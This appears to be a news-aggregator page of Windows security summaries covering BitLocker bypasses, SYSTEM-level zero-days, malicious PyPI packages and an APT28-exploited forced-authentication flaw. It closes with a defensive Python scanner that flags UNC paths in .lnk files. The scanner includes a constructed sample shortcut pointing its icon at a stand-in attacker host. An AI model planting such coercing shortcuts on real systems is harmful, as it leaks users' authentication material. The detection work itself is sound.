Recent reports from WatchGuard and ESET describe two banking trojan campaigns targeting users in Latin America and Europe. The Grandoreiro malware is aimed at Windows devices, while the BTMOB RAT is built for Android. The campaigns specifically target companies in Spain, Portugal, and Mexico, as well as mobile users in Brazil. Both families are designed to siphon sensitive financial information, which makes them a significant risk to businesses and individual users alike. As the operators keep adapting their tactics, users need to remain vigilant and keep basic device and data protections in place.
Articles tagged "Windows"
Found 53 articles
The Hacker News
Microsoft has published a mitigation for a significant vulnerability in its BitLocker drive-encryption feature, nicknamed YellowKey and tracked as CVE-2026-45585. The flaw, rated CVSS 6.8, lets an attacker bypass BitLocker's key protections and read data from an encrypted volume. It was publicly disclosed last week, prompting Microsoft to issue mitigation guidance rather than a patch so far. The issue affects Windows systems that rely on BitLocker for disk encryption; because BitLocker is widely used by businesses and individuals to secure data at rest, affected users should apply the mitigation as soon as possible.
BleepingComputer
Microsoft has recently disclosed a zero-day vulnerability known as YellowKey that affects Windows BitLocker, which is used for encrypting drives. This vulnerability allows unauthorized access to protected drives, posing a significant risk to users' sensitive data. While Microsoft has not specified which particular versions of Windows are impacted, the potential for exploitation raises concerns for many users and organizations relying on BitLocker for data protection. Microsoft has provided mitigation strategies to help users safeguard their systems until a more permanent fix is available. It is crucial for users to implement these mitigations to prevent unauthorized access to their data.
A researcher has released an exploit called MiniPlasma for a Windows privilege-escalation bug that Microsoft believed it had fixed in 2020 as CVE-2020-17103 in the Cloud Files mini filter driver (cldflt.sys). The exploit reuses the original proof-of-concept code, which still works because the 2020 fix was incomplete, and security experts are concerned it will be used in real-world attacks. Systems with every available update installed remain exposed, so a large number of users and organizations are vulnerable until Microsoft ships a corrected fix. An attacker with an existing low-privileged foothold could use the exploit to escalate to SYSTEM. Companies and users should watch for a new patch and apply it as soon as it is available.
Security Affairs
A security researcher known as Chaotic Eclipse has disclosed a serious zero-day in the Windows Cloud Files mini filter driver (cldflt.sys), nicknamed MiniPlasma, that yields SYSTEM privileges on fully updated Windows 11 systems. The bug was supposedly patched in 2020 as CVE-2020-17103, but that fix appears to have been incomplete or not properly implemented. A public proof-of-concept exploit exists, so a local attacker or malware running with ordinary user rights could escalate to SYSTEM and take full control of an affected host. Because fully patched Windows 11 builds are affected, there is no update to apply yet; organizations should review their security controls and add monitoring for local privilege escalation until a corrected fix ships.
A cybersecurity researcher has disclosed a serious vulnerability in Windows, known as 'MiniPlasma', which allows attackers to escalate their privileges to SYSTEM level on fully patched systems. This zero-day exploit poses a significant risk because it can enable unauthorized access to sensitive data and system controls. Users of Windows systems, particularly those in corporate environments, should be on high alert as this exploit can potentially be used in cyberattacks. The researcher has also released a proof-of-concept (PoC) for the exploit, which can facilitate its misuse by malicious actors. This situation underscores the need for immediate attention to system security measures and vigilance against potential exploitation.
A security researcher has disclosed two serious Windows vulnerabilities, named YellowKey and GreenPlasma. YellowKey is a BitLocker bypass that gives an attacker access to an encrypted drive, but it requires physical access to the device. GreenPlasma lets an attacker elevate to SYSTEM, potentially gaining full control of the affected system. Both matter to users and organizations that rely on Windows for sensitive work: companies should review the physical security of their devices against YellowKey and apply Microsoft's mitigation and updates as they become available.
Microsoft's new agentic security system has identified 16 vulnerabilities in the Windows networking and authentication stack, including four critical remote code execution (RCE) flaws. Among these, CVE-2026-40361 and CVE-2026-40364 are particularly concerning due to their higher likelihood of being exploited by attackers. These vulnerabilities could allow unauthorized users to execute arbitrary code on affected systems, potentially leading to severe security breaches. Organizations using Microsoft Windows should prioritize addressing these vulnerabilities to protect their systems from potential exploitation, especially as the threat landscape evolves. The discovery of these flaws underscores the importance of continuous security assessments in software development and deployment.
BleepingComputer
A security researcher has introduced a tool called GhostLock that abuses a legitimate Windows file API to prevent access to files on local systems and on SMB network shares. The proof-of-concept shows how an attacker could block users from reaching important files, causing significant disruption in both personal and organizational environments. The ability to deny file access this way is a particular concern for businesses that rely on shared network drives and highlights the need for better controls on file access. As the tool becomes known, companies and users may need to reassess their file-access controls. Because the technique uses intended API behaviour rather than a bug, it potentially affects any Windows system or application that relies on that API.
Cybersecurity researchers have identified three malicious packages on the Python Package Index (PyPI) that are distributing a new type of malware called ZiChatBot. These packages are designed to deliver harmful files while masquerading as legitimate software. Both Windows and Linux systems are at risk, as the malware can operate on both platforms. This incident raises concerns about the security of open-source repositories, where malicious actors can exploit the trust users place in these resources. Developers and users of Python packages should be vigilant and verify the authenticity of packages before installation to avoid falling victim to such attacks.
Researchers from Striga have identified two vulnerabilities in Ollama’s Windows auto-updater, designated as CVE-2026-42248 and CVE-2026-42249. When exploited together, these flaws could enable an attacker to install a persistent executable that would run every time a user logs in. Ollama is an open-source tool used for running large language models locally, appealing to users concerned about data privacy and cost. This discovery raises significant security concerns, as it could allow unauthorized access to user systems, potentially compromising sensitive data. Users of Ollama should be particularly vigilant and consider the implications of these vulnerabilities on their security posture.
BleepingComputer
Microsoft has acknowledged that the April 2026 security updates for Windows are causing issues with third-party backup applications that rely on the psmounterex.sys driver. This problem is affecting various backup solutions, preventing users from successfully backing up their data. The situation is significant as it could lead to data loss for individuals and businesses that depend on these backup tools for data protection. Microsoft has not yet released a specific fix or workaround for this issue, leaving users in a precarious position. Companies and users are advised to monitor for updates from Microsoft regarding this ongoing issue.
Researchers have identified a new Python-based backdoor called DEEP#DOOR, which is designed to gain persistent access to compromised systems and steal sensitive information, including browser and cloud credentials. The attack is initiated through a batch script named 'install_obf.bat', which disables essential Windows security features, allowing the malware to operate undetected. This backdoor can pose significant risks to both individual users and organizations, as it can access a wide range of data stored on affected devices. The stealthy nature of DEEP#DOOR makes it particularly dangerous, as it can remain hidden while actively siphoning off sensitive credentials. Users and companies need to be vigilant about their security measures to prevent such intrusions.
Help Net Security
CISA and Microsoft have warned that a Windows Shell vulnerability, CVE-2026-32202, is being exploited. The zero-click flaw makes a victim's system authenticate to an attacker-controlled server without user interaction, leaking authentication material to the attacker. CVE-2026-32202 stems from an incomplete fix for an earlier bug, CVE-2026-21510, which the APT28 group exploited with malicious LNK files. Microsoft patched CVE-2026-21510 in February 2026, but the new exploit bypasses that fix. Users and organizations running affected systems should apply the available updates promptly and stay alert for follow-on attacks.
A recently identified Windows vulnerability has been exploited by APT28, a Russia-linked hacking group, in attacks on Ukraine and several EU countries. The flaw enables zero-click attacks, meaning a system can be compromised without any user interaction. The patch meant to fix it was incomplete, raising doubts about its effectiveness and potentially leaving users at risk. Continued exploitation threatens sensitive data and national security in the affected countries; Windows users should keep up with patches and security advisories as the situation develops.
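The forced-authentication pattern in the two summaries above is worth a triage check on the attacker-supplied artefact. The following is an added example, not code from Help Net Security, Microsoft or the APT28 reporting: a small Python scanner that validates the Shell Link header and flags any UNC path (\\host\share\...) embedded in a .lnk file. It assumes, as a labelled assumption, that the authentication is coerced by a UNC reference in the shortcut's string data such as the icon location; the page does not describe the actual CVE-2026-32202 trigger. The sample shortcut bytes are constructed inline, and 203.0.113.10 is a documentation address.

```python
"""Triage heuristic for Windows shortcut (.lnk) files: report UNC references.

Added example; not code from Help Net Security, Microsoft or APT28 reporting.
Assumption (labelled): the forced authentication is triggered by a UNC path
(\\\\host\\share\\...) stored in the shortcut's string data, e.g. its icon
location. The page does not describe the real CVE-2026-32202 trigger.
Header layout follows the public [MS-SHLLINK] specification.
"""
import re
import struct

LNK_MAGIC = b"\x4c\x00\x00\x00"  # HeaderSize field, always 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HEADER_SIZE = 0x4C

# LinkFlags bits from [MS-SHLLINK] 2.1.1 (only the low byte is needed here).
LINK_FLAGS = {
    0x01: "HasLinkTargetIDList",
    0x02: "HasLinkInfo",
    0x04: "HasName",
    0x08: "HasRelativePath",
    0x10: "HasWorkingDir",
    0x20: "HasArguments",
    0x40: "HasIconLocation",
    0x80: "IsUnicode",
}


def parse_header(data: bytes) -> set:
    """Validate the ShellLinkHeader and return the set of LinkFlags names."""
    if len(data) < HEADER_SIZE or data[:4] != LNK_MAGIC or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    return {name for bit, name in LINK_FLAGS.items() if flags & bit}


def _utf16_run(data: bytes, start: int) -> str:
    """Read printable ASCII encoded as UTF-16LE starting at `start`."""
    out = []
    i = start
    while i + 1 < len(data) and data[i + 1] == 0 and 0x20 <= data[i] < 0x7F:
        out.append(chr(data[i]))
        i += 2
    return "".join(out)


def _ansi_run(data: bytes, start: int) -> str:
    """Read a printable single-byte string starting at `start`."""
    out = []
    i = start
    while i < len(data) and 0x20 <= data[i] < 0x7F:
        out.append(chr(data[i]))
        i += 1
    return "".join(out)


def find_unc_refs(data: bytes) -> list:
    """Return every distinct \\\\host... string found anywhere in the blob.

    StringData is UTF-16LE when IsUnicode is set and ANSI otherwise, so both
    encodings are searched. LinkInfo and the target ID list are not walked
    structurally, so this is a heuristic, not a full parser.
    """
    refs = []
    candidates = [(m.start(), _utf16_run) for m in re.finditer(rb"\\\x00\\\x00", data)]
    candidates += [(m.start(), _ansi_run) for m in re.finditer(rb"\\\\", data)]
    for offset, reader in candidates:
        s = reader(data, offset)
        # require at least one hostname character after the two backslashes
        if len(s) > 2 and s[2] != "\\" and s not in refs:
            refs.append(s)
    return refs


def scan_lnk(data: bytes) -> dict:
    """Header validation plus UNC search; suspicious if any UNC reference exists."""
    flags = parse_header(data)
    refs = find_unc_refs(data)
    return {"flags": sorted(flags), "unc_refs": refs, "suspicious": bool(refs)}


# --- constructed samples (built here for the example, not real malware) -----
def _header(flags: int) -> bytes:
    return LNK_MAGIC + LNK_CLSID + struct.pack("<I", flags) + bytes(HEADER_SIZE - 24)


def _string_data(s: str) -> bytes:
    # StringData item of a Unicode link: CountCharacters (u16) + UTF-16LE chars
    return struct.pack("<H", len(s)) + s.encode("utf-16-le")


HAS_ICON_UNICODE = 0x40 | 0x80
# Icon location on an attacker host (203.0.113.10 is a documentation address).
SAMPLE_COERCING_LNK = _header(HAS_ICON_UNICODE) + _string_data(r"\\203.0.113.10\share\icon.ico")
# Icon location on the local disk: must not be flagged.
SAMPLE_BENIGN_LNK = _header(HAS_ICON_UNICODE) + _string_data(r"C:\Windows\System32\shell32.dll")

if __name__ == "__main__":
    for name, blob in (("coercing", SAMPLE_COERCING_LNK), ("benign", SAMPLE_BENIGN_LNK)):
        print(name, scan_lnk(blob))
```

Run it against a suspicious attachment with `scan_lnk(open(path, "rb").read())`. The search is deliberately encoding-agnostic and does not walk LinkInfo or the ID list, so treat a hit as a reason to block or detonate the file rather than as proof of exploitation, and remember that a zero-click trigger living outside the shortcut's strings will not show up here.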